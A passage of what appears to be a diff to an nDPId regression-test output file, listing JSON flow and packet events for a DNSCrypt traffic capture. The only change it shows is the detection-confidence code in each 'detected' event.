AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":501,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396047} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":501,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAABQlEQAuX4R66QKAAABkFtq4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAIclEVAAH4RqpAKAAABkFtq49QhAbsCCL4UZloBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAIclEZAAH4Rqo8KAAABkFtq49itAbsCCL4UZlwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAXclEcgAH4Rxs4KAAABkFtq49O8AbsGBCzXZl0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":505,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396047} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":505,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAABQlEcAuX4R66EKAAABkFtq4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":946739396069,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739396069,"pkt":"ZmZmZmZmRERERERECABFAADTkQZAADcR9hiQW2rjCgAAAQG7oJQAvzbjZluBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAIcSFhAAH4R+qEKAAABLuPIN4INIPsCCLnwFdMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAXcSFkgAH4RFuEKAAABLuPIN5ViIPsGBDRUFdABAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 